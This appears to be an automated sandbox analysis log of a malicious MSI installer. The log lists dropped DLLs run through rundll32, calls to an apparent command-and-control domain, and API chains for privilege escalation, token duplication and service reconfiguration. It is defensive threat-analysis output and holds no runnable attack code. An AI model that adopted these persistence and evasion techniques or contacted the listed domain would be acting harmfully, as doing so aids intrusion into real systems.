                      Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/06
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/5
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/I
                      Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/IP
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/RYPT32.dll.mui3N
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/ace
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/r
                      Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/zTEum
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/rRb&u
                      Source: rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/x
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.6:49723 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 360total.dll.2.drStatic PE information: section name: yhDm^
                      Source: Update_71a2ec86.dll.6.drStatic PE information: section name: yhDm^
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B33C20 GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetLastError,FreeLibrary,5_2_00B33C20
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF7B40 NtFreeVirtualMemory,6_2_0000026387CF7B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF7A54 NtWriteFile,6_2_0000026387CF7A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF79C8 NtClose,6_2_0000026387CF79C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF78C0 NtReadFile,6_2_0000026387CF78C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF378C NtClose,6_2_0000026387CF378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF77B0 RtlInitUnicodeString,NtCreateFile,6_2_0000026387CF77B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CFAD34 NtAllocateVirtualMemory,6_2_0000026387CFAD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,6_2_0000026387CF463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF7588 RtlInitUnicodeString,NtCreateFile,NtClose,6_2_0000026387CF7588
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CFB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,6_2_0000026387CFB1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CFB0C4 NtOpenKey,RtlpNtOpenKey,6_2_0000026387CFB0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF7ACC NtClose,6_2_0000026387CF7ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF7704 NtQueryInformationFile,6_2_0000026387CF7704
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF7694 RtlInitUnicodeString,NtDeleteFile,6_2_0000026387CF7694
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CFCB54 NtDelayExecution,6_2_0000026387CFCB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387D00AF0 NtWriteFile,6_2_0000026387D00AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387D00A90 NtDeleteFile,GetVolumeInformationW,6_2_0000026387D00A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387D00AC0 NtFreeVirtualMemory,GetVolumeInformationW,6_2_0000026387D00AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387D00A78 NtClose,6_2_0000026387D00A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF745C RtlInitUnicodeString,NtOpenFile,NtClose,6_2_0000026387CF745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82B0C4 NtOpenKey,RtlpNtOpenKey,7_2_000002095B82B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,7_2_000002095B82463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82378C NtClose,7_2_000002095B82378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B8277B0 RtlInitUnicodeString,NtCreateFile,7_2_000002095B8277B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,7_2_000002095B82B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82AD34 NtAllocateVirtualMemory,7_2_000002095B82AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B827B40 NtFreeVirtualMemory,7_2_000002095B827B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82CB54 NtDelayExecution,7_2_000002095B82CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B830A78 NtClose,7_2_000002095B830A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B830A90 NtDeleteFile,GetVolumeInformationW,7_2_000002095B830A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B827694 RtlInitUnicodeString,NtDeleteFile,7_2_000002095B827694
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B830AC0 NtFreeVirtualMemory,GetVolumeInformationW,7_2_000002095B830AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B8278C0 NtReadFile,7_2_000002095B8278C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B827ACC NtClose,7_2_000002095B827ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B827A54 NtWriteFile,7_2_000002095B827A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82745C RtlInitUnicodeString,NtOpenFile,NtClose,7_2_000002095B82745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B827588 RtlInitUnicodeString,NtCreateFile,NtClose,7_2_000002095B827588
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B8279C8 NtClose,7_2_000002095B8279C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B827704 NtQueryInformationFile,7_2_000002095B827704
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6DAD34 NtAllocateVirtualMemory,8_2_000002268D6DAD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D7B40 NtFreeVirtualMemory,8_2_000002268D6D7B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D7ACC NtClose,8_2_000002268D6D7ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6DB0C4 NtOpenKey,8_2_000002268D6DB0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6E0AC0 NtFreeVirtualMemory,CreateToolhelp32Snapshot,8_2_000002268D6E0AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D78C0 NtReadFile,8_2_000002268D6D78C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D7694 RtlInitUnicodeString,NtDeleteFile,8_2_000002268D6D7694
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6DCB54 NtDelayExecution,8_2_000002268D6DCB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D7704 NtQueryInformationFile,8_2_000002268D6D7704
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6DB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,8_2_000002268D6DB1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D79C8 NtClose,8_2_000002268D6D79C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D77B0 RtlInitUnicodeString,NtCreateFile,8_2_000002268D6D77B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D378C NtClose,8_2_000002268D6D378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D7588 RtlInitUnicodeString,NtCreateFile,NtClose,8_2_000002268D6D7588
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D7A54 NtWriteFile,8_2_000002268D6D7A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D745C RtlInitUnicodeString,NtOpenFile,NtClose,8_2_000002268D6D745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,8_2_000002268D6D463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006A2C8: DeviceIoControl,6_2_000000018006A2C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018004B1A4
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\62b2e8.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB539.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5A8.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B135729E-0574-44D1-B7A1-6E44550F506B}Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB616.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB6D3.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIB539.tmpJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B36A505_2_00B36A50
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B6F0325_2_00B6F032
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B692A95_2_00B692A9
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B5C2CA5_2_00B5C2CA
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B5E2705_2_00B5E270
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B684BD5_2_00B684BD
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B5A5875_2_00B5A587
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B6D8D55_2_00B6D8D5
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B3C8705_2_00B3C870
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B549205_2_00B54920
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B5A9155_2_00B5A915
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B60A485_2_00B60A48
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B39CC05_2_00B39CC0
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B65D6D5_2_00B65D6D
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180017FE86_2_0000000180017FE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006DFF46_2_000000018006DFF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800220D86_2_00000001800220D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007C1406_2_000000018007C140
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800601746_2_0000000180060174
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018008023C6_2_000000018008023C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000834C6_2_000000018000834C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006C4706_2_000000018006C470
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800784E06_2_00000001800784E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800764F06_2_00000001800764F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800605786_2_0000000180060578
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800105806_2_0000000180010580
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004E5DC6_2_000000018004E5DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800626006_2_0000000180062600
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800046386_2_0000000180004638
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A6506_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006E7606_2_000000018006E760
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800647B06_2_00000001800647B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007E7C76_2_000000018007E7C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800769306_2_0000000180076930
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800629546_2_0000000180062954
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006A9946_2_000000018006A994
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006E9FC6_2_000000018006E9FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180082A186_2_0000000180082A18
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180072A276_2_0000000180072A27
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180010B586_2_0000000180010B58
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180026C846_2_0000000180026C84
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001ECF46_2_000000018001ECF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180008E206_2_0000000180008E20
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180052FD86_2_0000000180052FD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003AFE86_2_000000018003AFE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005D0146_2_000000018005D014
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006F0B46_2_000000018006F0B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800630CC6_2_00000001800630CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005912C6_2_000000018005912C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A46_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800492786_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007B2D06_2_000000018007B2D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B2EC6_2_000000018002B2EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006D3D46_2_000000018006D3D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E06_2_00000001800033E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800754806_2_0000000180075480
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800694A06_2_00000001800694A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005958C6_2_000000018005958C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800576DC6_2_00000001800576DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800097E06_2_00000001800097E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800277FC6_2_00000001800277FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002D9646_2_000000018002D964
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180073B606_2_0000000180073B60
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007BBB06_2_000000018007BBB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001BC386_2_000000018001BC38
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005DD186_2_000000018005DD18
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180073DF06_2_0000000180073DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180011DF06_2_0000000180011DF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005BE6C6_2_000000018005BE6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004FF886_2_000000018004FF88
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF10306_2_0000026387CF1030
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B8210307_2_000002095B821030
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D10308_2_000002268D6D1030
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018000CF30 appears 33 times
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180005348 appears 71 times
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: String function: 00B5325F appears 103 times
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: String function: 00B53790 appears 39 times
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: String function: 00B53292 appears 70 times
                      Source: ad.msiBinary or memory string: OriginalFilenameviewer.exeF vs ad.msi
                      Source: ad.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs ad.msi
                      Source: classification engineClassification label: mal88.troj.evad.winMSI@12/30@1/1
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,6_2_0000000180049050
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,6_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018008395A
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B33860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,FindCloseChangeNotification,Process32NextW,CloseHandle,5_2_00B33860
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B34BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,5_2_00B34BA0
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B345B0 LoadResource,LockResource,SizeofResource,5_2_00B345B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,6_2_0000000180049AEC
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLB691.tmpJump to behavior
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\runnung
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB151.tmpJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: rundll32.exe, rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drBinary or memory string: select * from sqlite_sequence;
                      Source: rundll32.exe, rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drBinary or memory string: update sqlite_sequence set seq = 0 where name='MT';
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIB6D3.tmp "C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC CJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIB6D3.tmp "C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homqJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
